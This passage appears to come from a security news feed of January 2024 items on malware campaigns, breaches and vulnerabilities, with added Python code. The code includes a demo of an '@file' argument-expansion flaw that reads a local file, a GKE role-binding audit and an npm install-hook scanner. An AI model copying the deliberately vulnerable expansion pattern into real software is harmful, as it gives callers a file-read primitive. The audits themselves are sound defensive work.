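    """Defensive pre-check for a front end that has no legitimate use for
    '@file' expansion: refuse the request before the parser sees it."""
    offending = [a for a in args if a.startswith("@")]
    if offending:
        raise ValueError(f"refusing '@file' argument(s): {offending}")
    return args


def demo():
    """Write a constructed 'sensitive' file, then show what a caller learns
    with the feature on versus off. Returns (vulnerable, hardened)."""
    with tempfile.TemporaryDirectory() as tmp:
        sensitive = Path(tmp) / "secret.txt"
        sensitive.write_text("first-secret-line\nsecond-secret-line\n", encoding="utf-8")
        args = ["-name", f"@{sensitive}"]              # argument chosen by the caller
        vulnerable = expand_at_files(args)             # file contents land in the argument list
        hardened = expand_at_files(args, enabled=False)  # '@' token stays a literal string
        return vulnerable, hardened


if __name__ == "__main__":
    on, off = demo()
    print("expansion on :", on)
    print("expansion off:", off)
```

The point the model makes visible is that the file is read with the privileges of the process parsing the command, and that the caller needs no permission on the file itself; any error message or echo that reflects the expanded argument back becomes the read primitive. Disabling the feature removes the filesystem access entirely, which is why the advisory's mitigation is to turn it off rather than to filter paths.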

January 25, 2024 – Solution

Apple Debuts New Feature to Frustrate iPhone Thieves Full Text

Abstract A new iOS 17 update brings Stolen Device Protection feature to prevent unauthorized access and actions on stolen iPhones. Thieves will have limited access to sensitive information and actions, requiring additional authentication for critical changes.

Cyware

January 25, 2024 – Malware

LODEINFO Fileless Malware Evolves with Anti-Analysis and Remote Code Tricks Full Text

Abstract Cybersecurity researchers have uncovered an updated version of a backdoor called LODEINFO that's distributed via spear-phishing attacks. The findings come from Japanese company ITOCHU Cyber & Intelligence, which said the malware "has been updated with new features, as well as changes to the anti-analysis (analysis avoidance) techniques." LODEINFO versions 0.6.6 and 0.6.7 were documented by Kaspersky in November 2022, detailing the backdoor's capabilities to execute arbitrary shellcode, take screenshots, and exfiltrate files back to an actor-controlled server. A month later, ESET disclosed attacks targeting Japanese political establishments that led to the deployment of LODEINFO. The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021. Attack chains commence with phishing emails bearing

The Hacker News

January 25, 2024 – General

Report: AI, Fake CFOs Drive Soaring Corporate Payment-Fraud Attacks Full Text

Abstract According to Trustpair, 96% of U.S. companies experienced at least one payment fraud attempt in the past year, with a 71% increase from the prior year, indicating a significant rise in fraudulent activities.

Cyware

January 25, 2024 – General

Cyber Threat Landscape: 7 Key Findings and Upcoming Trends for 2024 Full Text

Abstract The 2023/2024 Axur Threat Landscape Report provides a comprehensive analysis of the latest cyber threats. The information combines data from the platform's surveillance of the Surface, Deep, and Dark Web with insights derived from the in-depth research and investigations conducted by the Threat Intelligence team. Discover the full scope of digital threats in the Axur Report 2023/2024. Overview: In 2023, the cybersecurity landscape witnessed a remarkable rise in cyberattacks. One notable shift was the integration of cyber risk with business risk, a concept gaining traction in boardrooms worldwide. As the magnitude of losses due to cyberattacks became evident, organizations started reevaluating their strategies. Geopolitical factors played a significant role in shaping information security. The conflicts between nations like Russia and Ukraine had ripple effects, influencing the tactics of cybercriminals. It was a year where external factors intertwined with digital threats. Ran

The Hacker News

January 25, 2024 – Government

HHS Details New Cyber Performance Goals for Health Sector Full Text

Abstract The performance goals consist of essential and enhanced practices based on industry cybersecurity frameworks and aim to address common vulnerabilities and mature cybersecurity capabilities in the healthcare sector.

Cyware

January 25, 2024 – Breach

Netherlands-based Medical Lab Database Exposed 1.3 Million Records, COVID Test Information Full Text

Abstract A Netherlands-based medical laboratory's unsecured database exposed 1.3 million records, including COVID test results and personal identifiable information, due to a configuration issue and lack of response to responsible disclosure notices.

Cyware

January 25, 2024 – General

Report: Software Supply Chain Attacks Are Getting Easier Full Text

Abstract In 2023, ReversingLabs identified a significant increase in malicious packages across open-source software platforms like npm, PyPI, and RubyGems. The number of malicious packages detected increased by 1,300% from 2020 and 28% from 2022.

Cyware

January 25, 2024 – Policy and Law

Federal Judge Rejects NSO’s Effort to Dismiss Apple’s Pegasus Lawsuit Full Text

Abstract Apple's lawsuit alleges that NSO Group facilitated hacking into Apple's servers, leading to significant time and expense for Apple in detecting and eradicating Pegasus from users' devices.

Cyware

January 25, 2024 – Education

Organizations need to switch gears in their approach to email security Full Text

Abstract According to Egress, email security incidents continue to have severe impacts on organizations, with 94% experiencing security incidents in the past year, including data loss, exfiltration, and phishing attacks.

Cyware

January 25, 2024 – Attack

China-backed Hackers Hijack Software Updates to Implant “NSPX30” Spyware Full Text

Abstract A previously undocumented China-aligned threat actor has been linked to a set of adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software to deliver a sophisticated implant named NSPX30. Slovak cybersecurity firm ESET is tracking the advanced persistent threat (APT) group under the name Blackwood. It's said to be active since at least 2018. The NSPX30 implant has been observed deployed via the update mechanisms of known software such as Tencent QQ, WPS Office, and Sogou Pinyin, with the attacks targeting Chinese and Japanese manufacturing, trading, and engineering companies as well as individuals located in China, Japan, and the U.K. "NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor," security researcher Facundo Muñoz said. "Both of the latter two have their own sets of plugins." "The implant was designed around the attackers

The Hacker News

January 25, 2024 – Attack

Ukrainian Hackers Claim Attack on Russian Scientific Research Center Full Text

Abstract The Ukrainian hacker group "BO Team" reportedly breached a Russian scientific research center, destroying its database and equipment. The target, the State Research Center on Space Hydrometeorology, is a key enterprise for processing satellite data.

Cyware

January 25, 2024 – Attack

New CherryLoader Malware Mimics CherryTree to Deploy PrivEsc Exploits Full Text

Abstract A new Go-based malware loader called CherryLoader has been discovered by threat hunters in the wild delivering additional payloads onto compromised hosts for follow-on exploitation. Arctic Wolf Labs, which discovered the new attack tool in two recent intrusions, said the loader's icon and name masquerade as the legitimate CherryTree note-taking application to dupe potential victims into installing it. "CherryLoader was used to drop one of two privilege escalation tools, PrintSpoofer or JuicyPotatoNG, which would then run a batch file to establish persistence on the victim device," researchers Hady Azzam, Christopher Prest, and Steven Campbell said. In another novel twist, CherryLoader also packs modularized features that allow the threat actor to swap exploits without recompiling code. It's currently not known how the loader is distributed, but the attack chains examined by the cybersecurity firm show that CherryLoader ("cherrytree.exe") and i

The Hacker News

January 25, 2024 – Policy and Law

French Regulators Levy $34.7 Million Fine Against Amazon for Surveilling Employees Full Text

Abstract France's data protection authority, CNIL, has fined Amazon €32 million ($34.7 million) for excessive monitoring of employees in its warehouses and for not promptly deleting the data.

Cyware

January 25, 2024 – Attack

Tech Giant HP Enterprise Hacked by Russian Hackers Linked to DNC Breach Full Text

Abstract Hackers with links to the Kremlin are suspected to have infiltrated information technology company Hewlett Packard Enterprise's (HPE) cloud email environment to exfiltrate mailbox data. "The threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions," the company said in a regulatory filing with the U.S. Securities and Exchange Commission (SEC). The intrusion has been attributed to the Russian state-sponsored group known as APT29, which is also tracked under the monikers BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. The disclosure arrives days after Microsoft implicated the same threat actor in the breach of its corporate systems in late November 2023 to steal emails and attachments from senior executives and other individuals in the company's cybersecurity and legal d

The Hacker News

January 25, 2024 – General

The Effect of Omission Bias on Vulnerability Management Full Text

Abstract Omission bias in vulnerability management leads to the reluctance to patch vulnerabilities, despite evidence showing the importance of timely patching to prevent cyberattacks.

Cyware

January 25, 2024 – Government

UK Tells Business Leaders to ‘Toughen Up’ Against Cyberattacks Full Text

Abstract The increase in ransomware attacks in the UK is attributed to the success of the ransomware-as-a-service ecosystem, making it easier for criminals to engage in disruptive attacks.

Cyware

January 25, 2024 – Vulnerabilities

Security Vendors are Accused of Bending CVE Assignment Rules Full Text

Abstract Both Juniper Networks and Ivanti have attracted criticism from members of the infosec industry for the way they've handled the disclosure of vulnerabilities over the past week.

Cyware

January 25, 2024 – Breach

Data from Indian Online Gaming Platforms Teenpatti.com and Mpl.live on Sale Full Text

Abstract The alleged data breach at Teenpatti.com and Mpl.live underscores the urgent need for improved security measures in online gaming platforms, especially in handling large volumes of personal user data.

Cyware

January 25, 2024 – Malware

Unmasking MacOS Malware in Pirated Apps Full Text

Abstract Pirated applications targeting macOS users distribute a backdoor, allowing attackers to download and execute multiple payloads. Each application includes a malicious dylib, a backdoor, and a persistent downloader, posing a significant threat to users. The researchers from Jamf Threat Labs identified ...

Cyware

January 24, 2024 – Vulnerabilities

Google Kubernetes Misconfig Lets Any Gmail Account Control Your Clusters Full Text

Abstract Cybersecurity researchers have discovered a loophole impacting Google Kubernetes Engine (GKE) that could be potentially exploited by threat actors with a Google account to take control of a Kubernetes cluster. The critical shortcoming has been codenamed Sys:All by cloud security firm Orca. As many as 250,000 active GKE clusters in the wild are estimated to be susceptible to the attack vector. In a report shared with The Hacker News, security researcher Ofir Yakobi said it "stems from a likely widespread misconception that the system:authenticated group in Google Kubernetes Engine includes only verified and deterministic identities, whereas in fact, it includes any Google authenticated account (even outside the organization)." The system:authenticated group is a special group that includes all authenticated entities, counting human users and service accounts. As a result, this could have serious consequences when administrators inadvertently bestow it with overly permi

The Hacker News
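The misconception the report above describes is easy to audit for: on GKE, any binding whose subject is the group system:authenticated (or system:unauthenticated) is reachable by any Google account, so the question is which such bindings exist and what role each grants. The following is an added example, not Orca's tooling or anything from Google, that reads the JSON shape produced by `kubectl get clusterrolebindings,rolebindings -A -o json` and lists every binding that hands a role to those groups. The sample document is constructed, and the list of stock Kubernetes bindings to ignore (basic-user, discovery, public-info-viewer) is an assumption to compare against your own baseline.

```python
import json

# Groups that include every authenticated identity, which on GKE means any Google
# account and not only members of the organization, as the report explains.
OVERBROAD_GROUPS = {"system:authenticated", "system:unauthenticated"}

# Bindings stock Kubernetes creates for these groups. They grant discovery and
# self-subject review only and are normally expected; treat this allowlist as an
# assumption and compare it against what your clusters actually ship with.
DEFAULT_ROLES = {"system:basic-user", "system:discovery", "system:public-info-viewer"}


def find_overbroad_bindings(binding_list, ignore_defaults=True):
    """Return every ClusterRoleBinding or RoleBinding in the given
    `kubectl ... -o json` document that grants a role to an overbroad group.
    Each finding is (kind, namespace, binding name, role name, group); the
    namespace is empty for cluster-scoped bindings."""
    findings = []
    for item in binding_list.get("items", []):
        role = item["roleRef"]["name"]
        if ignore_defaults and role in DEFAULT_ROLES:
            continue
        meta = item["metadata"]
        for subject in item.get("subjects") or []:   # subjects may be absent or null
            if subject.get("kind") == "Group" and subject.get("name") in OVERBROAD_GROUPS:
                findings.append((item["kind"], meta.get("namespace", ""),
                                 meta["name"], role, subject["name"]))
    return findings


# Constructed sample in the shape of `kubectl get ... -o json` output; not real
# cluster data. One stock binding, one that makes every Google account a
# cluster-admin, one namespaced grant, and one correctly scoped service account.
SAMPLE = json.loads("""
{"items": [
  {"kind": "ClusterRoleBinding", "metadata": {"name": "system:basic-user"},
   "roleRef": {"kind": "ClusterRole", "name": "system:basic-user"},
   "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
  {"kind": "ClusterRoleBinding", "metadata": {"name": "everyone-is-admin"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
  {"kind": "RoleBinding", "metadata": {"name": "dev-edit", "namespace": "dev"},
   "roleRef": {"kind": "ClusterRole", "name": "edit"},
   "subjects": [{"kind": "Group", "name": "system:authenticated"},
                {"kind": "User", "name": "alice@example.com"}]},
  {"kind": "ClusterRoleBinding", "metadata": {"name": "ci-deployer"},
   "roleRef": {"kind": "ClusterRole", "name": "edit"},
   "subjects": [{"kind": "ServiceAccount", "name": "ci", "namespace": "ci"}]}
]}
""")

if __name__ == "__main__":
    for finding in find_overbroad_bindings(SAMPLE):
        print("OVERBROAD:", finding)
```

Run it with `ignore_defaults=False` once to see the baseline, then with the default setting on a schedule; any finding it returns is a role that every Google account in the world can assume against that cluster, and the fix is to replace the group subject with the specific users, groups or service accounts that actually need the role.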

January 24, 2024 – Solution

What is Nudge Security and How Does it Work? Full Text

Abstract In today's highly distributed workplace, every employee has the ability to act as their own CIO, adopting new cloud and SaaS technologies whenever and wherever they need. While this has been a critical boon to productivity and innovation in the digital enterprise, it has upended traditional approaches to IT security and governance. Nudge Security is the world's first and only solution to address SaaS security and governance at scale by working with employees, not against them. Unlike legacy solutions that attempt to block employees' access to unsanctioned SaaS applications, Nudge Security helps IT and security leaders adapt and align to the needs of the business. The platform orchestrates SaaS administration without sacrificing visibility, centralized governance, or control over the organization's cloud and SaaS security posture. How Nudge Security works: Nudge Security discovers all SaaS accounts ever created by anyone in your organization within minutes of starting a free

The Hacker News

January 24, 2024 – Ransomware

Kasseika Ransomware Using BYOVD Trick to Disarm Security Pre-Encryption Full Text

Abstract The ransomware group known as Kasseika has become the latest to leverage the Bring Your Own Vulnerable Driver (BYOVD) attack to disarm security-related processes on compromised Windows hosts, joining the likes of other groups like Akira, AvosLocker, BlackByte, and RobbinHood. The tactic allows "threat actors to terminate antivirus processes and services for the deployment of ransomware," Trend Micro said in a Tuesday analysis. Kasseika, first discovered by the cybersecurity firm in mid-December 2023, exhibits overlaps with the now-defunct BlackMatter, which emerged in the aftermath of DarkSide's shutdown. There is evidence to suggest that the ransomware strain could be the handiwork of an experienced threat actor that acquired or purchased access to BlackMatter, given that the latter's source code has never publicly leaked after its demise in November 2021. Attack chains involving Kasseika commence with a phishing email for initial access, subsequently

The Hacker News

January 23, 2024 – Attack

Black Basta Gang Claims the Hack of the UK Water Utility Southern Water Full Text

Abstract The Black Basta ransomware gang targeted the UK water utility Southern Water, threatening to leak 750 gigabytes of stolen sensitive data, including personal and corporate documents.

Cyware

January 23, 2024 – Criminals

VexTrio: The Uber of Cybercrime - Brokering Malware for 60+ Affiliates Full Text

Abstract The threat actors behind ClearFake, SocGholish, and dozens of other campaigns have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal. The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said, describing VexTrio as the "single largest malicious traffic broker described in security literature." VexTrio, which is believed to have been active since at least 2017, has been attributed to malicious campaigns that use domains generated by a dictionary domain generation algorithm (DDGA) to propagate scams, riskware, spyware, adware, potentially unwanted programs (PUPs), and pornographic content. This includes a 2022 activity cluster that distributed the Glupteba malware following an earlier attempt by Google to take down a significant chunk of its infrastructure in

The Hacker News

January 23, 2024 – Breach

Slug Ransomware Attacked AerCap, Claims to Have Stolen 1TB Data Full Text

Abstract AerCap, the world's largest aircraft leasing company, reported a ransomware infection. However, it claims to have not suffered financial losses and has control over its systems.

Cyware

January 23, 2024 – Malware

Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub Full Text

Abstract Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encoded SSH keys stolen from developer systems on which they were installed (Base64 is an encoding, not encryption, so the keys are recoverable by anyone who can read the repository). The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024. Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k. Both modules are designed to run a postinstall script after installation, each capable of retrieving and executing a different JavaScript file. While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named "meow," raising the possibility that the threat actor used a placeholder name during the early stages of development.

The Hacker News
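Both packages above did their damage from a postinstall script, which npm runs automatically and without prompting during `npm install`. The check a practitioner wants is an inventory of every package in a dependency tree that declares an install-time lifecycle hook, so that the short list can be reviewed before anything runs. The following is an added example, not ReversingLabs' tooling or npm's own code: it walks a node_modules directory, reads each package.json, and reports the install hooks it finds. The node_modules tree it scans is constructed in a temporary directory so the example runs offline; the package names and commands in it are invented.

```python
import json
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs on its own during `npm install`; postinstall is the
# one the two packages described above used.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_install_scripts(node_modules):
    """Walk a node_modules tree and return {package name: {hook: command}} for
    every package whose package.json declares an install-time hook."""
    findings = {}
    for manifest in Path(node_modules).rglob("package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue  # malformed or unreadable manifest: skip it, do not abort the audit
        scripts = data.get("scripts") or {}
        hooks = {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}
        if hooks:
            findings[data.get("name", manifest.parent.name)] = hooks
    return findings


def build_sample_tree(root):
    """Create a constructed node_modules tree: one package with no install hooks
    and one that wires postinstall to a script file shipped in the package."""
    root = Path(root)
    clean = root / "node_modules" / "left-pad-ish"
    clean.mkdir(parents=True)
    clean.joinpath("package.json").write_text(json.dumps({
        "name": "left-pad-ish", "version": "1.0.0",
        "scripts": {"test": "node test.js"}}), encoding="utf-8")
    hooked = root / "node_modules" / "suspicious-pkg"
    hooked.mkdir(parents=True)
    hooked.joinpath("package.json").write_text(json.dumps({
        "name": "suspicious-pkg", "version": "0.0.3",
        "scripts": {"postinstall": "node setup.js"}}), encoding="utf-8")
    hooked.joinpath("setup.js").write_text("// stand-in for whatever the hook would run\n",
                                           encoding="utf-8")
    return root / "node_modules"


def demo():
    """Build the constructed tree and audit it. Returns the findings dict."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_install_scripts(build_sample_tree(tmp))


if __name__ == "__main__":
    for name, hooks in demo().items():
        print(f"{name}: {hooks}")
```

To stop hooks from running at all, install with `npm install --ignore-scripts` (or set `npm config set ignore-scripts true` for a workstation or CI runner) and then run the audit on the resulting tree; the handful of packages that legitimately need a build step can be allowed through individually once someone has read their script.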

January 23, 2024 – Ransomware

Threat Assessment of BianLian Ransomware Full Text

Abstract The BianLian ransomware group has shifted from a double extortion scheme to a focus on extortion without encryption, posing a significant threat to organizations, particularly in the healthcare and manufacturing sectors in the US and Europe.

Cyware

January 23, 2024 – Malware

“Activator” Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets Full Text

Abstract Cracked software has been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, and can infect Macs on both Intel and Apple silicon processor architectures. The attack chains leverage booby-trapped disk image (DMG) files that include a program named "Activator" and a pirated version of legitimate software such as xScope. Users who open the DMG files are urged to move both files to the Applications folder and run the Activator component to apply a supposed patch and run the xScope app. Launching Activator, however, displays a prompt asking the victim to enter the system administrator password, thereby allowing it to execute a Mach-O binary with elevated permissions in order to launch the modif

The Hacker News

January 23, 2024 – Breach

Update: LoanDepot Says 16.6 Million Customers had ‘Sensitive Personal’ Information Stolen in Cyberattack Full Text

Abstract The company is working to restore normal business operations, but many online services remain inaccessible even after two weeks. It is still uncertain whether the cyber incident will have a significant impact on LoanDepot's financial condition.

Cyware

January 23, 2024 – Denial Of Service

From Megabits to Terabits: Gcore Radar Warns of a New Era of DDoS Attacks Full Text

Abstract As we enter 2024, Gcore has released its latest Gcore Radar report, a twice-annual publication in which the company releases internal analytics to track DDoS attacks. Gcore's broad, internationally distributed network of scrubbing centers allows them to follow attack trends over time. Read on to learn about DDoS attack trends for Q3–Q4 of 2023, and what they mean for developing a robust protection strategy in 2024. Gcore's Key Findings: DDoS attack trends for the second half of 2023 reveal alarming developments in the scale and sophistication of cyberthreats. Unprecedented Attack Power: The past three years have brought about a >100% annual increase in DDoS peak (registered maximum) attack volume. In 2021, the peak capacity of DDoS attacks was 300 Gbps; in 2022, it increased to 650 Gbps; in Q1–Q2 of 2023, it increased again to 800 Gbps; in Q3–Q4 of 2023, it surged to 1600 Gbps (1.6 Tbps). Notably, the jump in H2 of 2023 means the cybersecurity industry is measuring DDoS a

The Hacker News

January 23, 2024 – Hacker

North Korean ScarCruft Attackers Gear Up to Target Cybersecurity Professionals Full Text

Abstract The group is testing innovative infection routines that use technical threat research on another North Korean APT group, Kimsuky, as a lure, indicating a new approach to their cyberattacks.

Cyware

January 23, 2024 – Policy and Law

BreachForums Founder Sentenced to 20 Years of Supervised Release, No Jail Time Full Text

Abstract Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias "pompompurin," was arrested in March 2023 in New York and was subsequently charged with conspiracy to commit access device fraud and possession of child pornography. He was later released on a $300,000 bond, and in July 2023, he pleaded guilty to the charges. BreachForums was a major cyber crime marketplace that facilitated the trafficking of stolen data since March 2022. Prior to its shutdown exactly a year later, the website boasted of over 340,000 members. Among the stolen items commonly sold on the platform were bank account information, Social Security numbers, personally identifying information (PII), hacking tools, breached databases, and account login information for compromised online accounts with service providers and merchants. BreachForums also advertised servic

The Hacker News

January 23, 2024 – Solution

New Method To Safeguard Against Mobile Account Takeovers Full Text

Abstract The method involves modeling how account access changes as devices, SIM cards, or apps are disconnected from the account ecosystem, providing insights into complex hacking attacks.

Cyware

January 23, 2024 – Vulnerabilities

~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation Full Text

Abstract Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations. The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5. Merely days after the flaw became public knowledge, nearly 40,000 exploitation attempts targeting CVE-2023-22527 had been recorded in the wild, starting as early as January 19, from more than 600 unique IP addresses, according to both the Shadowserver Foundation and the DFIR Report. The activity is currently limited to "testing callback attempts and 'whoami' execution," suggesting that threat actors are opportunistically scanning for vulnerable servers

The Hacker News

January 23, 2024 – General

Historic Data Leak Reveals 26 Billion Records From Tencent, Weibo, Twitter, Adobe, and Others Full Text

Abstract The leaked information spans across various companies, organizations, and government agencies globally. The potential impact on consumers is significant, as the leaked data could be used for credential-stuffing attacks and spear-phishing.

Cyware

January 20, 2024 – Hacker

Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years Full Text

Abstract An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been attributed to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021. "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities," Google-owned Mandiant said in a Friday report. The vulnerability in question is CVE-2023-34048 (CVSS score: 9.8), an out-of-bounds write that could be put to use by a malicious actor with network access to vCenter Server to achieve remote code execution. It was fixed by the Broadcom-owned company on October 24, 2023. The virtualization services provider, earlier this week, updated its advisory to acknowledge that "exploitation of CVE-2023-34048 has occurred in the wild." UNC3886 first came to light in September 2022 when it was

The Hacker News

January 20, 2024 – APT

China-linked APT UNC3886 Exploits VMware Zero-Day Since 2021 Full Text

Abstract Mandiant researchers observed UNC3886 exploiting a VMware ESXi zero-day vulnerability in June 2023, using novel malware persistence techniques to achieve administrative access within VMware ESXi Hypervisors.

Cyware

January 20, 2024 – Government

CISA Issues Emergency Directive to Federal Agencies on Ivanti Zero-Day Exploits Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products. The development came after the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – came under widespread exploitation by multiple threat actors. Chained together, the flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system. The U.S. company acknowledged in an advisory that it has witnessed a "sharp increase in threat actor activity" starting on January 11, 2024, after the shortcomings were publicly disclosed. "Successful exploitation of the vulnerabilities in these affected products allows a malicious threat actor to move laterally, perform data exfiltration, and

The Hacker News

January 20, 2024 – Breach

Microsoft’s Top Execs’ Emails Breached in Sophisticated Russia-Linked APT Attack Full Text

Abstract Microsoft on Friday revealed that it was the target of a nation-state attack on its corporate systems that resulted in the theft of emails and attachments from senior executives and other individuals in the company's cybersecurity and legal departments. The Windows maker attributed the attack to a Russian advanced persistent threat (APT) group it tracks as Midnight Blizzard (formerly Nobelium), which is also known as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, and The Dukes. It further said that it immediately took steps to investigate, disrupt, and mitigate the malicious activity upon discovery on January 12, 2024. The campaign is estimated to have commenced in late November 2023. "The threat actor used a password spray attack to compromise a legacy non-production test tenant account and gain a foothold, and then used the account's permissions to access a very small percentage of Microsoft corporate email accounts, including members of our senior leadership team a

The Hacker News

January 20, 2024 – Phishing

Invoice Phishing Alert: TA866 Deploys WasabiSeed & Screenshotter Malware Full Text

Abstract The threat actor tracked as  TA866  has resurfaced after a nine-month hiatus with a new large-volume phishing campaign to deliver known malware families such as WasabiSeed and Screenshotter. The campaign, observed earlier this month and blocked by Proofpoint on January 11, 2024, involved sending thousands of invoice-themed emails targeting North America bearing decoy PDF files. "The PDFs contained OneDrive URLs that, if clicked, initiated a multi-step infection chain eventually leading to the malware payload, a variant of the WasabiSeed and Screenshotter custom toolset," the enterprise security firm  said . TA866 was  first documented  by the company in February 2023, attributing it to a campaign named Screentime that distributed WasabiSeed, a Visual Basic script dropper that's used to download Screenshotter, which is capable of taking screenshots of the victim's desktop at regular intervals of time and exfiltrating that data to an actor-controlled domain. There

The Hacker News

January 19, 2024 – Outage

Update: LoanDepot Outage Drags Into Second Week After Ransomware Attack Full Text

Abstract The mortgage and loan company LoanDepot experienced a suspected ransomware attack, leading to difficulties for customers in making mortgage payments and accessing their online accounts.

Cyware

January 19, 2024 – Criminals

PolyCrypt Runtime Crypter Being Sold on Cybercrime Forums Full Text

Abstract The underground market for crypters, exemplified by PolyCrypt, facilitates the sale and use of these tools for malicious purposes, highlighting the ongoing challenge of cybercrime.

Cyware

January 19, 2024 – Breach

Update: Vans, Supreme Owner VF Corp Says Hackers Stole 35 Million Customers’ Personal Data Full Text

Abstract The clothing company has not specified the type of data stolen but assured that Social Security numbers, bank account information, and payment card details were not retained.

Cyware

January 19, 2024 – Malware

Experts Warn of macOS Backdoor Hidden in Pirated Versions of Popular Software Full Text

Abstract Pirated applications targeting Apple macOS users have been observed containing a backdoor capable of granting attackers remote control to infected machines. "These applications are being hosted on Chinese pirating websites in order to gain victims," Jamf Threat Labs researchers Ferdous Saljooki and Jaron Bradley said. "Once detonated, the malware will download and execute multiple payloads in the background in order to secretly compromise the victim's machine." The backdoored disk image (DMG) files, which have been modified to establish communications with actor-controlled infrastructure, include legitimate software like Navicat Premium, UltraEdit, FinalShell, SecureCRT, and Microsoft Remote Desktop. The unsigned applications, besides being hosted on a Chinese website named macyy[.]cn, incorporate a dropper component called "dylib" that's executed every time the application is opened. The dropper then acts as a conduit to fetch a backdoor

The Hacker News

January 19, 2024 – Education

Preventing Data Loss: Backup and Recovery Strategies for Exchange Server Administrators Full Text

Abstract In the current digital landscape, data has emerged as a crucial asset for organizations, akin to currency. It's the lifeblood of any organization in today's interconnected and digital world. Thus, safeguarding the data is of paramount importance. Its importance is magnified in on-premises Exchange Server environments where vital business communication and emails are stored and managed. In this article, you will learn about the evolving threats of data loss, the shift in responsibilities of administrators, and key backup and recovery strategies for preventing data loss in the Exchange Server environment. Data Loss Scenarios in Exchange Servers: Data loss in on-premises Exchange Server environments has become increasingly common. Cybersecurity threats, like ransomware attacks, have emerged as a significant cause of data loss in recent years, with many financially motivated threat actors increasingly targeting the vulnerabilities in Exchange Servers. These attackers try to exploit

The Hacker News

January 19, 2024 – Malware

Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package Full Text

Abstract A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines. The package, named " oscompatible ," was published on January 9, 2024, attracting a total of 380 downloads before it was taken down. oscompatible included a "few strange binaries," according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file. This JavaScript file ("index.js") executes an "autorun.bat" batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows. If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on "Windows Server OS." The batch script, for its part, verifies if it has admin privil

The Hacker News

January 18, 2024 – Botnet

Malicious Extortion Bot Targets Publicly Exposed PostgreSQL and MySQL Databases Full Text

Abstract The bot gains access to the databases, deletes all tables and databases, and leaves a ransom note demanding payment for data recovery. However, the bot only saves a small portion of the data, even if the ransom is paid.

Cyware

January 18, 2024 – Malware

New Docker Malware Steals CPU for Crypto & Drives Fake Website Traffic Full Text

Abstract Vulnerable Docker services are being targeted by a novel campaign in which the threat actors are deploying the XMRig cryptocurrency miner as well as the 9Hits Viewer software as part of a multi-pronged monetization strategy. "This is the first documented case of malware deploying the 9Hits application as a payload," cloud security firm Cado said, adding the development is a sign that adversaries are always on the lookout for diversifying their strategies to make money off compromised hosts. 9Hits advertises itself as a "unique web traffic solution" and an "automatic traffic exchange" that allows members of the service to drive traffic to their sites in exchange for purchasing credits. This is accomplished by means of software called 9Hits Viewer, which runs a headless Chrome browser instance to visit websites requested by other members, for which they earn credits to pay for generating traffic to their sites. The exact method used to spread the malwa

The Hacker News

January 18, 2024 – Phishing

TA866 Returns with a Large Email Campaign Full Text

Abstract The new campaign by TA866 involved a large volume of emails with attached PDFs containing OneDrive URLs that initiated a multi-step infection chain leading to a malware payload.

Cyware

January 18, 2024 – Phishing

Russian COLDRIVER Hackers Expand Beyond Phishing with Custom Malware Full Text

